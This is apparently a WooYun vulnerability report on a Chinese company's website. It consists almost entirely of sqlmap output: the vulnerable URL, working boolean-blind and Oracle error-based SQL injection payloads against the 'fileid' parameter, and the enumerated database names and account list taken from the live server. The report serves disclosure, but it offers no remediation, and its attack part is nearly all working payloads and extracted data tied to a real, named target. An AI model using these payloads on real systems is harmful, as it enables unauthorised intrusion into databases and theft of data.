WooYun.org

高阳通联集团
www.hisunsray.com
http://www.hisunsray.com/news/comp_view.asp?fileid=10485729&typeId=2550
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: fileid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fileid=10485729 AND 6456=6456&typeId=2550
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: fileid=10485729 AND 7629=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(104)||CHR(113)||CHR(102)||CHR(58)||(SELECT (CASE WHEN (7629=7629) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(112)||CHR(118)||CHR(105)||CHR(58)||CHR(62))) FROM DUAL)&typeId=2550
---
available databases [8]:
[*] CTXSYS
[*] EXFSYS
[*] HISUNOA
[*] MDSYS
[*] OLAPSYS
[*] SPWEB
[*] SYS
[*] SYSTEM
database management system users [29]:
[*] ANONYMOUS
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] HISUNOA
[*] HISUNWWW
[*] IMS
[*] INFORM
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PEOA
[*] PERFSTAT
[*] SI_INFORMTN_SCHEMA
[*] SPWEB
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] YKSOFT
OK、